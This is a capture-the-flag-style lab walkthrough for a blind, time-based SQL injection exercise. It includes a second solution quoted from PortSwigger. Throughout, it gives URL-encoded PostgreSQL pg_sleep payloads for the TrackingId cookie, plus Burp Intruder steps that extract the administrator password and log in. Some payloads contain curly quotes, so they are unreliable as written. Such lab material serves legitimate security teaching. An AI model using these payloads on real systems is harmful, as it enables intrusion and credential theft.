This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Pre-Requisite

Find the type of database using the below SQL Injection cheat sheet

Solution

1. Capture the request of the homepage and send it to the repeater. we know that there is a tracking cookie where the vulnerability lies.
2. Add the below query at the end of TrackingId value in encoded format.
   ‘;SELECT CASE WHEN(username='administrator' AND LENGTH(password)>10) THEN pg_sleep(0) ELSE pg_sleep(3) END FROM users--
3. Make sure to URL encode the payload by selecting it and clicking Ctrl+u on burp suite to Encode or you can use the encoded payload below
   `%3bSELECT+CASE+WHEN(username%3d’administrator’+AND+LENGTH(password)>10)+THEN+pg_sleep(0)+ELSE+pg_sleep(3)+END+FROM+users--
4. The query uses a boolean-based blind injection technique to check the length of the password for the administrator user in the ‘users’ table. If the password length is greater than 10, it will give the response immediately; otherwise, it will give the response in 3 seconds delay.
5. we have to find the length of the admin password by incrementing the length of the password value from 5 to 30( assuming that, the password is not more than 30 characters)
6. The Above process can be automated by sending this request to the intruder → adding 5 as payload position → Setting numbers payload type → setting 10 as From value, 30 as To value and 1 as Step value
7. To find the time delay responses, → Go to the Resource Pool tab in Intruder → Click create new resource pool and add any name → Click maximum concurrent request and set the value to 1 → start attack
8. After the attack is completed, click on the Columns menu and select Response Received. Now, notice that the response time starting from the 20th request has a time delay of over 3000 milli-seconds in the response received column. (If you increase the seconds to 5 then the response will have 5000 ms)
9. Now, we know that the length of the password is 20 from step 7. So we have to find the letters of the password
10. Go to the repeater and use the below query as we did for the previous one (URL Encode the below payload)
    ‘;SELECT CASE WHEN(username='administrator' AND SUBSTR(password,1,1)=’a’) THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users--
11. URL Encoded Payload ‘%3bSELECT+CASE+WHEN(username%3d’administrator’+AND+SUBSTR(password,1,1)%3d’a’)+THEN+pg_sleep(3)+ELSE+pg_sleep(0)+END+FROM+users--
12. This SQL injection query attempts to determine if the first character of the password for the ‘administrator’ user in the ‘users’ table is ‘a’. If it is true, it will give the response in3 seconds delay; otherwise, it will give the responseimmediately.
13. We have to keep changing the letters from ‘a’ to ‘z’ and ‘0’ to ‘9’ to find the actual letters of the password. So we have to automate this thing using Intruder.
14. Send the request to Intruder → from substring add the first 1 as payload position and ‘a’ as the second payload position →Choose Cluster Bomb
15. → Select Numbers as payload type for payload 1 → give 1 as From value, 20 as To value and 1 as Step value
16. → Select Bruteforcer as payload type for payload 2 → give 1 as value for min length and max length .
17. To find the time delay responses, → Go to the Resource Pool tab in Intruder → Click on the resource pool that we created in Step 6 and click Start attack.
18. After the Attack Completed, Click on the Columns menu and select Response Received and also click the Response Received column to sort out the responses which have a response time of over 3000 milli-seconds
19. Note down the characters in an arranged manner by using Payload1 numbers
20. Use that password to log in to the administrator account to solve the lab

Solution 2 — Portswigger

1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
2. Modify the TrackingId cookie, changing it to:
   TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
Verify that the application takes 10 seconds to respond.
3. Now change it to:
   TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
Verify that the application responds immediately with no time delay. This demonstrates how you can test a single boolean condition and infer the result.
4. Now change it to:
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
Verify that the condition is true, confirming that there is a user called administrator.
5. The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to:
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
This condition should be true, confirming that the password is greater than 1 character in length.
6. Send a series of follow-up values to test different password lengths. Send:
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
Then send:
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
And so on. You can do this manually using Burp Repeater, since the length is likely to be short. When the condition stops being true (i.e. when the application responds immediately without a time delay), you have determined the length of the password, which is in fact 20 characters long.
7. After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so you need to use Burp Intruder. Send the request you are working on to Burp Intruder, using the context menu.
8. In the Positions tab of Burp Intruder, change the value of the cookie to:
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
This uses the SUBSTRING() function to extract a single character from the password, and test it against a specific value. Our attack will cycle through each position and possible value, testing each one in turn.
9. Place payload position markers around the a character in the cookie value. To do this, select just the a, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers):
   TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
10. To test the character at each position, you’ll need to send suitable payloads in the payload position that you’ve defined. You can assume that the password contains only lower case alphanumeric characters. Go to the Payloads tab, check that “Simple list” is selected, and under “Payload settings” add the payloads in the range a — z and 0–9. You can select these easily using the “Add from list” drop-down.
11. To be able to tell when the correct character was submitted, you’ll need to monitor the time taken for the application to respond to each request. For this process to be as reliable as possible, you need to configure the Intruder attack to issue requests in a single thread. To do this, go to the “Resource pool” tab and add the attack to a resource pool with the “Maximum concurrent requests” set to 1.
12. Launch the attack by clicking the “Start attack” button or selecting “Start attack” from the Intruder menu.
13. Burp Intruder monitors the time taken for the application’s response to be received, but by default it does not show this information. To see it, go to the “Columns” menu, and check the box for “Response received”.
14. Review the attack results to find the value of the character at the first position. You should see a column in the results called “Response received”. This will generally contain a small number, representing the number of milliseconds the application took to respond. One of the rows should have a larger number in this column, in the region of 10,000 milliseconds. The payload showing for that row is the value of the character at the first position.
15. Now, you simply need to re-run the attack for each of the other character positions in the password, to determine their value. To do this, go back to the main Burp window, and the Positions tab of Burp Intruder, and change the specified offset from 1 to 2. You should then see the following as the cookie value:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
16. Launch the modified attack, review the results, and note the character at the second offset.
17. Continue this process testing offset 3, 4, and so on, until you have the whole password.
18. In the browser, click “My account” to open the login page. Use the password to log in as the administrator user.